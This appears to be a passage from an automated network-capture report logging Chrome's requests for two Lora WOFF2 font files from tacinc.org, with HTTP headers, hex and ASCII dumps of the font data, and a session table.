                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 19364
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:26 GMT
                                                                                                                                                                                                                              ETag: "66f56b8e-4ba4"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 527517
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9adcee916-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 4b a4 00 11 00 00 00 00 d3 90 00 00 4b 41 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 46 1b eb 1c 1c 83 6c 06 60 00 84 2e 08 40 09 82 73 11 10 0a 82 92 58 81 f2 44 0b 83 70 00 01 36 02 24 03 87 5c 04 20 05 83 32 07 86 35 0c 83 44 1b 63 c0 15 ec 56 66 b7 03 78 97 f8 7e 9a 91 81 dc 0e bc a6 26 25 3f 3b 50 7b 1c 78 49 3c b5 ec ff 53 92 1b 22 03 f7 90 e9 db bf aa 82 22 41 09 b1 9d 34 cb 53 93 1b 86 7d 52 5a 3e cf 34 a9 a8 61 f3 53 30 94 b3 d0 03 cb 19 5a a1 2a 49 b8 a0 1c 10 dc 5c 89 49 75 87 ab 79 d3 6b 7c ef 28 b1 22 0d cc 38 f9 92 d6 9b 3a d0 0b 1f 34 d9 49 4d 15 d7 54 a8 30 63 1f b8 f5 38 37 be 81 e8 17 e8 af 41 b1 8e 3d 03 db 46 fe 24 27 af cd f3 f1 fb 41 3b 77 de 5f 73 47 c5 33 19 4a d8 0a 84
                                                                                                                                                                                                                              Data Ascii: wOF2KKAFl`.@sXDp6$\ 25DcVfx~&%?;P{xI<S""A4S}RZ>4aS0Z*I\Iuyk|("8:4IMT0c87A=F$'A;w_sG3J
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 55 19 05 10 f4 30 61 64 0b 04 bf 8c ac 6f 86 e8 cf ea d1 6d 30 14 01 68 4f c0 47 46 32 e6 e0 bb f1 fc 93 23 db 20 e8 d5 09 88 db 2b 01 03 06 f6 ec b0 95 98 3c 34 42 00 37 24 2b 2f af a5 81 98 b2 98 3f 31 0c 6c 03 56 04 eb c4 8e 90 3d d8 af 64 0f ae 8f a5 41 5c 90 2b f8 3d 1a 1b d6 49 98 a0 2e 68 01 b4 19 3a 61 dd d3 3c 62 09 71 85 58 47 74 13 3f ca 81 6f 11 0f 88 67 24 02 c6 85 6d 20 3b ff 95 7b 2e 39 44 a3 3d 39 76 ac 3c d6 1b db 1a 3b 8d b6 93 76 8c f6 26 8e 12 17 8a 6b 8f fb 97 be 81 be 9b fe 33 fe 6b 5f a0 df a2 bf 20 98 81 31 d8 80 64 60 f2 c2 11 48 64 00 19 85 60 6a e1 34 b4 a2 44 8b 11 2b 4e 3c 1d 23 93 14 79 f2 15 a8 cb 7e f6 c5 37 df fd 50 d0 a6 5d 87 7f ba 15 f5 1a 34 66 dc 84 49 d3 66 cc 9a 33 6f c1 92 65 2b 56 ad 59 b7 69 cb b6 1d bb f6 ec 3b
                                                                                                                                                                                                                              Data Ascii: U0adom0hOGF2# +<4B7$+/?1lV=dA\+=I.h:a<bqXGt?og$m ;{.9D=9v<;v&k3k_ 1d`Hd`j4D+N<#y~7P]4fIf3oe+VYi;
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 5b 86 b8 5b 95 8a c8 36 17 6d ed 30 b7 17 e9 4d 81 38 ad 68 b6 29 4b c3 d5 01 e5 a0 41 7b a7 10 2a 8b 6f fa 39 ac 4c 95 13 40 a5 e2 a5 ea 00 32 56 63 10 92 20 60 5f 93 cc 03 43 d8 c2 62 a0 30 7c d4 72 2a 57 a1 63 1a d3 84 2e b9 d2 15 48 6b f5 65 19 e4 39 82 1a 4f 49 41 bd cd e0 d8 6e 57 46 b1 a8 e9 66 93 b3 dc 27 26 59 1a 2a 76 8f 09 a0 44 58 1e 21 5d 3f b3 da c5 ca b2 8d 62 6a 7c 1c 4d a4 05 9a 7b 47 13 2e 81 9a 7c 0d f9 88 a9 60 4c d7 40 fb c7 29 7d a5 2e 0b 7a 84 76 c2 06 55 d0 88 11 d7 f5 2a ef 76 75 e2 d0 36 ad 9e 5d 6e 76 b2 3e dc 98 10 81 02 a9 88 88 04 53 50 40 34 34 30 31 62 10 e2 c4 21 19 19 d1 98 98 d0 a5 48 a1 54 a6 0c 4b 85 0a 01 2a 55 f2 57 a5 8a af 06 0d a4 1c 1c fc b4 69 c3 d0 ae 5d a0 0e 1d 64 76 d9 85 ef a6 9b 70 0f 3a 1f be c3 50 35 cf
                                                                                                                                                                                                                              Data Ascii: [[6m0M8h)KA{*o9L@2Vc `_Cb0|r*Wc.Hke9OIAnWFf'&Y*vDX!]?bj|M{G.|`L@)}.zvU*vu6]nv>SP@4401b!HTK*UWi]dvp:P5
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 1d c4 dc 53 1a 2b db 28 0a cd 42 f6 30 87 33 05 0b bd 6c 4d a3 74 8e af 4e 3d da eb e4 4a 23 89 5c 7d 9a 5b 00 a5 76 f0 a4 79 6e 8d 05 ba ec b4 3e e3 61 02 bf 5b c9 9b 35 23 0a 84 af 5b f1 93 3a e9 ae ab 76 74 dd 1b 7a 2e 71 54 4b bc 53 80 9c da 1c 79 9b 52 f4 cb c7 6c d7 ad e7 53 74 24 ad 52 36 57 5d 7f a9 63 40 b1 1a 22 ef da 08 a0 38 bc 7c 72 a0 db e4 d5 14 6d 92 32 de 79 48 f2 6c 6e 75 31 de ca 7f 6d 55 9d 74 3d 6d 40 27 a4 28 07 07 e7 46 8c c1 c7 19 5d 6b b7 59 0f 53 aa 89 c2 d7 13 57 e4 bc 16 e9 8a 01 46 a8 03 5f 36 5a aa 43 ae c5 d7 bf b2 23 f5 66 7f aa 1e 4a a6 85 ad 46 fe 16 8a 7e 4e 06 1c 89 93 62 5e 89 0a 61 6a 95 d7 2a c0 46 04 8a 1d 22 b2 8d d7 2d ac 16 ce 3d d4 d8 e5 97 87 a6 de 3e 2c 2c c8 79 10 ab 8e 65 9d 42 96 a7 0b a0 97 fb 38 d9 93 c6
                                                                                                                                                                                                                              Data Ascii: S+(B03lMtN=J#\}[vyn>a[5#[:vtz.qTKSyRlSt$R6W]c@"8|rm2yHlnu1mUt=m@'(F]kYSWF_6ZC#fJF~Nb^aj*F"-=>,,yeB8
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: ed 7e 33 ca 44 8f 3c d6 e3 be 56 d3 bd f7 d0 48 a5 7e f4 83 9f 54 38 ea 90 c3 8e 39 c2 e9 b8 13 ce 3a ed 0c 97 0b ba 9c 73 de 29 17 5d 75 c9 65 d7 5d 31 c9 35 77 ff 48 f0 89 dc 73 d3 2e 8b 75 5a 68 a9 45 96 58 f6 4d 98 da 57 5a 65 b5 8d ee 7a 1b ac c0 b6 a7 b3 c5 0e 5b 4d b6 dd 7e 7b ec b5 cf 01 bb 1d 74 c3 ce 3f 56 b4 45 93 5b cc 9f f1 cd 30 8a 64 96 a8 45 3a 2d a5 45 22 a4 aa 33 84 59 36 30 bf 13 b0 93 8a 96 11 68 45 00 bb ba d8 f9 f9 3d f9 21 d8 7f e2 02 e6 2d f7 1c 43 68 c9 b5 0b 79 e6 7c 08 e6 a5 b3 98 f0 87 1f d2 b8 a0 fd 9b 29 8b c3 ec 44 55 07 5c b0 fd 1f 42 7b b7 68 5c f0 fd 9b ad 4e 5c 75 55 9e 4d 61 a7 3a 37 77 5e 5b d7 49 59 a9 a6 ea 3a 27 a1 82 6e fd c1 3d d4 77 da 23 28 a7 fc 2b c7 6e c8 82 2b 99 f3 12 bb e8 30 5c bd dd 9e a4 71 21 68 70 c2
                                                                                                                                                                                                                              Data Ascii: ~3D<VH~T89:s)]ue]15wHs.uZhEXMWZez[M~{t?VE[0dE:-E"3Y60hE=!-Chy|)DU\B{h\N\uUMa:7w^[IY:'n=w#(+n+0\q!hp
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 18 99 46 4e 65 47 3f d7 e3 d2 b6 87 d9 7a 64 f9 03 c9 24 4a 49 7b 08 8a 83 d9 7c f6 28 17 72 90 7d 29 ac d8 8b 4d 9c ee 16 b5 61 80 6d c3 39 78 52 a9 3d b9 6b 1f f2 55 4a fa da f6 71 3d de fd ea ea 81 a7 75 49 47 17 d2 16 46 61 0b 51 02 9c 9d 81 63 8e 6c c9 55 dc 89 5f a4 13 d0 de ed 15 d6 91 e2 9a 6c db 77 1d a9 17 9b 77 e4 3e b2 cc 26 2f 12 c1 f1 73 9c 16 bd bb d7 c8 79 76 f4 29 e8 b0 0d f8 f1 58 e1 00 5b 0e 33 2f 3a 81 12 fe 09 18 d8 bd ad 8d 9b 85 a1 fb 44 89 03 66 e9 52 c9 3c f5 fe 07 f1 cd 98 5e b5 90 5c 20 4e 27 4e 97 95 4e ab d1 a5 2f 40 a0 02 72 0a 7e d7 8d 79 5c 5f a9 5a 1a a1 9e 22 f8 a0 9d c6 8f 62 99 22 8c a3 2f 11 de 1f b7 84 ef 83 f7 f5 ba c6 36 fc 8a e7 6a 99 ec 1b 98 e6 6c b5 48 f3 f1 59 5b e1 d7 70 3c 6a 85 fb 6a 95 e8 c6 31 24 28 81 79
                                                                                                                                                                                                                              Data Ascii: FNeG?zd$JI{|(r})Mam9xR=kUJq=uIGFaQclU_lww>&/syv)X[3/:DfR<^\ N'NN/@r~y\_Z"b"/6jlHY[p<jj1$(y
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: a7 7c 07 e9 d4 aa 2c d8 69 48 86 c5 e3 3a 6b 2a cf 95 7f b4 15 60 d4 ab d6 42 38 4f fb 67 77 3a d3 6c ad 0d dd 0a c6 db a0 2f 6b 24 ee 47 32 31 ae 02 ee 08 06 df 01 91 83 d3 0e 63 84 d1 f6 a2 a9 7e e3 28 81 16 f0 d4 79 68 56 20 ce b7 e9 f6 62 c4 d8 02 2b ca 09 ef e9 0e ec c6 52 7c 4c 75 24 41 68 ba f5 db 45 b5 80 5b f0 28 6e a0 b7 20 1e e1 2e f3 dd 6c e7 4d 23 2f 14 b7 4d e3 da a4 c9 77 23 dd 43 88 4b 66 64 22 41 34 42 02 a1 0d be b8 ec d1 59 a1 fa 2a 3d 9e 9f 12 dc b1 13 a5 e3 63 6c 5a 8b ab b0 45 a1 b4 dd 12 08 8d 17 b8 76 0c 2b 1c 75 eb 16 29 01 5d 54 34 63 81 e1 c1 4a b5 c6 35 22 3f fe 1a 1c 25 67 59 b0 2a 9b 01 ba 7b dd 1e 5f 7c e2 68 16 aa bb 43 18 db 14 49 bb 0c ea f5 a5 0d 94 01 73 52 8e 87 f5 c6 38 c5 34 46 b4 fd 04 0b 2b 0c 57 1d 56 5b ae 04 b6
                                                                                                                                                                                                                              Data Ascii: |,iH:k*`B8Ogw:l/k$G21c~(yhV b+R|Lu$AhE[(n .lM#/Mw#CKfd"A4BY*=clZEv+u)]T4cJ5"?%gY*{_|hCIsR84F+WV[
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: a6 8d 3c 2d 33 7b 3e ae 59 4a 45 73 52 c0 c6 ed 6c d6 c4 9f 4d 48 90 2e c8 1b eb 07 f7 f5 1d 6d 1c 37 7d ba 5f b0 b2 a0 7d a2 23 f8 e4 a9 bd 68 74 3d b6 0e 5b 1b a6 86 72 f3 9c d3 87 73 dc 19 b3 fb 56 a3 ec 4e e1 e3 4c a4 9d 23 7e 5b 84 b4 4f b9 0e 16 80 2c c0 3a f7 d2 8d 06 cf ad 28 b4 33 91 f2 92 2d f5 33 75 56 5a 8d a5 40 b0 be 60 d4 44 47 a8 78 54 28 c5 e9 a0 a9 03 06 5b 61 47 2b b6 1a 5b 13 a6 14 e7 55 f9 59 a6 94 c2 86 91 9d 4b d1 ce db f6 1a 4f 73 a2 21 68 34 f8 67 f7 f9 f5 b2 a0 41 b6 4b 31 33 01 69 09 d7 8b c2 2b 03 3c d8 37 ee 67 7d 0d df 69 b8 b1 a6 d0 11 0e c5 f8 9c 28 f2 17 b1 16 b0 20 c1 dc 1d 8f 90 76 23 3d 6f 4c 2b ff 26 de d2 6c 95 b0 f6 e6 0f 1f 2c b5 f0 f7 59 b6 ca 8c 64 0b c7 34 51 91 76 45 97 13 96 d3 7a 41 58 21 64 b5 c0 5a 1d 39 b3
                                                                                                                                                                                                                              Data Ascii: <-3{>YJEsRlMH.m7}_}#ht=[rsVNL#~[O,:(3-3uVZ@`DGxT([aG+[UYKOs!h4gAK13i+<7g}i( v#=oL+&l,Yd4QvEzAX!dZ9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 5f 1b ec 87 4f fb 81 1b 9d 9a b9 6c 72 9f 67 e5 0e 94 e3 c2 96 2f 37 af aa 59 9a 94 3a 63 a3 7b 9d 54 10 c0 0e 84 fc 1b 94 b3 d9 72 74 cd 0d 8a eb 2f 8d f6 ea e6 ff 82 a7 be c9 65 bf 5f 7c ac 19 37 fd 12 28 0f 65 73 28 ee 79 7e 5e 66 ca 50 37 6d 4b 13 88 95 a2 5d b8 d8 78 9e 54 a6 b5 98 ac 66 e2 9d 35 25 20 ce 9d f3 a8 9f a5 fb 78 75 cd 1a c1 94 61 29 ce da c2 3c 9a 5d 73 5e c6 94 f9 dd 7f 84 05 5d c5 47 4a 45 8b 33 fb 5d 7e d8 1c 15 d6 2e c2 84 e6 48 4a 64 db c4 26 b0 4b bb 2d 25 a9 1b dd 36 7c 26 0b 9c b4 7e a0 30 e1 37 46 e1 11 8e ed 7d ec 28 a4 37 cf a4 0f 4a 83 21 88 82 db 42 38 7d 3c 03 ed 91 c6 74 08 1f 61 82 d6 82 dd 45 92 4f b6 c7 9b e7 9d 12 b1 3d ac 78 3a 5e f2 b9 f8 1a 90 e0 52 8a 28 3e 6f 72 f1 b5 93 f7 71 6b 00 5c 46 3c 3d da ce 65 33 ce 2c
                                                                                                                                                                                                                              Data Ascii: _Olrg/7Y:c{Trt/e_|7(es(y~^fP7mK]xTf5% xua)<]s^]GJE3]~.HJd&K-%6|&~07F}(7J!B8}<taEO=x:^R(>orqk\F<=e3,
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: bb de d7 01 1d 02 d9 ae 45 70 8b 65 c2 33 9b ff db 5f a7 34 67 59 65 97 e2 10 45 12 0d 75 cf cd fd ca fc 7d ce dd ff d3 0f 28 e9 8f 9e eb 52 03 e6 2b a5 71 bf d7 c8 1f 0b d0 de a7 83 72 ad c4 76 e0 95 c0 74 0b 4e c0 d3 b8 3d 62 b6 62 77 47 dd 35 1c ae 05 83 a9 78 bd c2 1b 70 26 f8 eb 0b 7c 58 67 52 fd fa d9 99 69 04 27 3a 4f 12 ca 98 6e 2f ad 92 67 f1 2d 94 77 84 6c 91 81 55 6f 0a 16 48 14 0a ab e8 12 60 4d 8f 22 0a d4 ab 73 e4 3f 9a 58 cd db 96 5f 2d d1 ff f0 65 fe e0 60 08 09 22 4c 44 39 5c 69 d6 6b 75 a1 c8 d1 0c 54 19 bb 3b 98 83 49 f1 c2 dc 5d df ee 49 15 83 f2 8b 3a 3b 19 bf 3c 86 1f 48 f7 05 a2 29 fe 5a b9 b7 e3 f2 ca 3b 34 88 d8 64 01 12 7b e3 76 d1 c2 40 83 e5 f7 db 7a 77 82 7f a4 cb 77 96 f8 c0 ae 56 e8 a2 a9 50 e1 80 0d 2e d4 01 5e 97 6d d7 84
                                                                                                                                                                                                                              Data Ascii: Epe3_4gYeEu}(R+qrvtN=bbwG5xp&|XgRi':On/g-wlUoH`M"s?X_-e`"LD9\ikuT;I]I:;<H)Z;4d{v@zwwVP.^m


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              58192.168.2.649785141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC676OUTGET /wp-content/themes/tac-child/css/fonts/lora-v16-latin-700.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 18528
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:26 GMT
                                                                                                                                                                                                                              ETag: "66f56b8e-4860"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9cb956b3a-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 48 60 00 10 00 00 00 00 9d 3c 00 00 48 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 58 1b fe 48 1c 83 10 06 60 3f 53 54 41 54 44 00 84 72 11 08 0a 81 9d 60 fc 28 0b 83 60 00 01 36 02 24 03 87 2c 04 20 05 84 4e 07 20 0c 07 1b 90 89 35 ec 26 fc eb cd aa 82 0c 8a fd 03 47 51 95 8a 51 94 70 d2 83 64 ff ff 29 49 c7 18 b2 e1 07 8a 69 55 ff a9 c2 22 48 a6 45 97 8d 2c 65 8f 79 04 f4 65 11 02 d9 3e 13 f3 92 02 c2 6e dc d1 7c cb bf c4 52 76 5e e4 29 fa 0e 38 30 1c 93 ea 26 51 49 83 4c c8 c1 ab 32 60 59 f1 d9 5c ae 75 b2 55 b8 6d b4 2b b7 3c 5f fb d9 c5 0a 9e 16 17 9f ee e9 1b de d1 e2 f8 90 1b 5f 94 23 04 27 88 75 5b 98 f8 97 4c 44 36 9d 67 e0 38 1f 35 d7 e2 f9 6d ff b3 e7 52 52 61 81 72 49 91 b4 ba
                                                                                                                                                                                                                              Data Ascii: wOF2H`<HXH`?STATDr`(`6$, N 5&GQQpd)IiU"HE,eye>n|Rv^)80&QIL2`Y\uUm+<__#'u[LD6g85mRRarI
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 01 e5 0f ad 01 e8 f3 10 18 c5 30 a2 23 8f 05 8c 04 23 dd bf 0e 50 a8 99 0d e7 da 8a b8 78 53 21 98 89 d4 04 74 91 6f 66 05 33 9f 69 40 3f 3a 1d 3d fd d8 1b d1 c3 81 c4 c0 d2 a0 75 8b dd 54 c2 a9 63 42 36 86 2e 0a bd 1f 46 0f 83 c3 e6 41 f9 db e1 67 71 c7 f1 7f 3f 09 e1 1b 42 5f 05 72 15 e1 29 31 e6 a8 26 e2 12 72 d5 09 48 48 52 2e 69 90 4d 8d 90 16 3c 24 0e b1 6d a4 41 58 8a 2c 52 d2 bd 6d a6 04 52 fc d4 d1 d4 ef a8 b7 69 99 b4 39 f0 90 27 19 49 cc 5f 58 7b de 79 cf d9 54 b6 8d 5d c7 9e c7 1e e1 98 38 e5 9c 59 9c d3 9c ab 5c 2a 2f 98 67 e0 2d e2 6d e4 fd ce 67 f2 6d 11 51 11 9b 05 3b 45 40 82 94 8e 91 4e 95 93 e5 02 c5 a1 d3 db 77 44 a9 52 56 29 7b 95 f7 55 c1 aa 28 95 4d 55 ac da ae ba ac 1a 50 fd ab 06 6a 87 86 af d9 a3 f9 5b a3 f0 03 24 1d d2 0c 68 b5
                                                                                                                                                                                                                              Data Ascii: 0##PxS!tof3i@?:=uTcB6.FAgq?B_r)1&rHHR.iM<$mAX,RmRi9'I_X{yT]8Y\*/g-mgmQ;E@NwDRV){U(MUPj[$h
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 9b ff c7 42 ad f0 0a 39 f2 4a 5e 29 8e ca bb 43 da 57 75 18 e4 36 d8 10 28 0c 8e c8 49 1f e2 8b 08 28 72 9d 6b 15 22 95 aa 54 d3 33 30 32 b1 1e b5 ab 38 34 a1 08 ec 6e b5 db 95 26 af 52 bd 7f 35 f4 1b 0d 35 99 69 5e d1 42 d7 ca d7 46 bf 3d 47 1d 6e ea 44 57 dd 85 6e ba 59 a2 df c0 e2 41 a1 21 b7 0c a7 69 44 64 b4 8c 2d 1e 4f dc 44 ca 26 53 35 25 33 b3 8b 59 d2 9c b1 79 0b c9 e7 26 bf 80 a0 90 70 17 d1 17 9d e1 98 85 c5 1c 2d b9 63 39 8d 15 86 57 85 d6 1c ad 5b d9 b0 4d 5b b6 17 c7 1d ec d8 4b 30 ec 32 ed 95 fd fc 40 db 27 42 9f 7e b3 43 99 a4 8d 63 a9 93 2a 3a 75 76 26 7d ef 95 f4 df b9 f6 de c1 c5 aa 87 f9 57 7d 5f a6 e2 b2 29 ca 65 2e 9f b3 8f c6 2e e5 2a dd 78 cf 6d ff 2e 7d f7 e9 7a 18 8f c3 bf 9a fa 8d e7 29 b2 67 f2 17 5b af 12 ff 1a 2a a4 e8 4d 90
                                                                                                                                                                                                                              Data Ascii: B9J^)CWu6(I(rk"T30284n&R55i^BF=GnDWnYA!iDd-OD&S5%3Yy&p-c9W[M[K02@'B~Cc*:uv&}W}_)e..*xm.}z)g[*M
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 26 a3 46 a7 54 ea 50 ea d4 95 77 3b eb 51 ea d5 a7 df 40 37 a4 e6 23 fc 08 08 0a 09 8b 88 5e 7b 09 17 57 db 35 be 1c 59 3d 9e 01 76 77 84 07 2d fd 6a f5 cf 57 9a 8a 91 b3 8e df 78 fc 4e b8 3a 90 72 a0 d2 23 c5 18 2d 0f bc 12 9e b0 da b6 c2 d6 65 39 5c 58 f4 d6 0c 14 70 0b 82 77 3f 62 43 77 47 33 77 e8 07 1a 3c 34 92 ad 76 43 d0 03 18 02 85 c1 11 c8 29 7e 65 1e de f4 26 e0 5e 7e df d9 b9 42 ca c5 b5 39 6d 19 70 84 05 b7 a6 9b ab b8 d5 43 93 d4 10 f7 f1 c6 07 1f 7d f2 c5 57 ff ae 3e d5 db 80 db 9b 46 e2 02 9d 9a 15 70 26 0e 0b b4 b2 ab cb ff 86 e3 1d 05 54 ed dc 9c ab bd f6 07 2b 59 19 db 9d 47 9c e3 72 f7 8e ab 8a 24 8b 13 c9 f8 fd 21 5e 1c 57 c6 39 56 c8 ce 8e ed 6b fc db fb e0 92 bc f7 0d d2 20 02 0c 04 0a 83 23 90 89 06 98 e4 21 78 eb 4a 56 ce 71 fb 48
                                                                                                                                                                                                                              Data Ascii: &FTPw;Q@7#^{W5Y=vw-jWxN:r#-e9\Xpw?bCwG3w<4vC)~e&^~B9mpC}W>Fp&T+YGr$!^W9Vk #!xJVqH
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 0d 37 b6 92 be 2d d2 9c f1 3b 02 33 7a 18 40 45 df 69 3a f7 26 a5 5d b8 71 1b e2 23 9f 93 a3 50 e4 6a b0 f1 10 e7 d3 cd bf ff 17 89 57 cc bf 02 26 4b be b1 94 d7 08 4a ec 7b e2 45 ec 3b 60 8e 86 8a c4 85 b8 72 e0 67 97 f9 4a 51 0e ac 87 8f 12 18 59 90 cf c1 82 40 61 70 04 b2 e9 d6 c8 07 6b 36 b2 26 0d 5e b8 f6 87 ba 9e f8 21 f0 e2 da 1b 33 94 6d 39 71 e0 1a f6 4a 24 6b 47 4e 2f 1b 38 b2 ef 5e 60 af 8c e3 38 8e e3 38 ce da e7 60 f7 cb ae 4b a7 7b c2 a3 27 cf bb b2 41 b9 83 21 50 18 1c f1 41 64 0d e9 72 56 1a 4e c1 2a 64 15 dc 6a d4 d6 13 ed 30 34 92 15 8c 4a 79 5d 54 f5 11 35 68 d4 a4 59 8b 56 6d f9 70 aa 46 22 1a 35 66 dc 84 c9 34 93 aa d9 34 17 d1 bc 05 cb 7b 8e 7d f2 44 44 bb 72 7b b1 4f 7e 90 b0 7b a6 c7 f4 64 ea f9 a1 55 cf 63 3a 1e 41 08 8a 88 98 84
                                                                                                                                                                                                                              Data Ascii: 7-;3z@Ei:&]q#PjW&KJ{E;`rgJQY@apk6&^!3m9qJ$kGN/8^`88`K{'A!PAdrVN*dj04Jy]T5hYVmpF"5f44{}DDr{O~{dUc:A
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: dc 88 87 07 c7 cb 8b f8 f8 18 f8 f9 85 0a 48 24 96 2a 8d 4a ba 74 61 32 e4 13 2a 50 40 ad 50 31 a6 54 25 a6 4a 15 a9 6a d5 c2 d5 a8 a1 50 ab 89 48 b3 66 46 ad da 28 48 82 ae 28 13 fc 25 a9 0d eb 26 c2 fc 64 d1 28 63 a0 94 b6 45 a3 a9 12 cc b2 a8 34 2a 71 40 ee 12 47 25 54 4b 75 54 4b 75 34 82 46 1e ae 21 80 89 89 5c 28 66 d2 4d d8 5f 32 03 30 96 4a 4b 4e 39 a2 ad 50 46 ea 20 ba 18 0b 27 2f 1f bf 80 64 a9 d2 65 10 31 b8 54 b5 1a b5 ea 9a 4d 74 e8 d2 df 09 ca 83 34 61 ae 98 25 24 00 3f 62 05 b8 00 79 cf 25 20 89 66 48 64 69 9c bc 9e bf 6f 74 37 bd 9b de 0c af be 7d e4 2e 8b cf 53 ae 71 13 e0 0e f7 05 e0 11 4f 01 5e c8 76 af 01 de f1 91 2f 7c e7 17 1f 02 68 19 69 83 b1 c4 0d fd be 15 a5 21 8a e8 12 95 84 c0 40 a7 c6 97 4c a0 b3 53 9a aa 34 00 40 37 67 42 3a
                                                                                                                                                                                                                              Data Ascii: H$*Jta2*P@P1T%JjPHfF(H(%&d(cE4*q@G%TKuTKu4F!\(fM_20JKN9PF '/de1TMt4a%$?by% fHdiot7}.SqO^v/|hi!@LS4@7gB:
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: d6 4a 10 d2 04 c2 06 33 da 73 10 73 9c dc ba 89 24 ef c7 ca 1c 45 94 5f e5 1e 37 10 11 d2 f1 bd 56 b7 aa d8 ba 71 bc fd d1 ba 4d 2e 3f 1d 19 70 13 00 6d d2 ee d8 cb 4e 3b 68 9b 03 e2 03 9a 02 9f fe b8 fb 73 12 6d b0 a0 e1 48 5a b7 cc 33 8c 36 04 a8 c6 1c 79 fa 79 d3 4c 8c e5 1c b4 e4 d5 30 87 6e 7b 09 0c 7c 78 f8 50 83 55 78 03 cf c4 12 cf ee d3 bb e4 a8 16 ed 8e af 70 f9 f2 56 82 81 3e 0c 39 19 71 ce 91 8f cd c1 13 fb 8c 9f 17 81 99 02 26 79 11 d1 2c 83 a1 cc 48 72 cd ef 25 10 ab f4 22 d4 37 ee 06 70 37 35 14 5a 5f 09 22 b8 33 ba e0 09 ff fd da 43 10 1f 3f eb 65 02 31 be 59 26 95 86 21 b0 77 1b ff 87 9d d6 bd 33 5e 41 db d6 cf e6 72 42 f1 44 67 6e cb 01 73 63 3e 3c 64 d6 b7 84 6e 6c 77 14 cd f5 6c 59 ad ad e7 fd 20 d2 62 45 d1 9d 40 10 d8 73 8e d5 8b 70
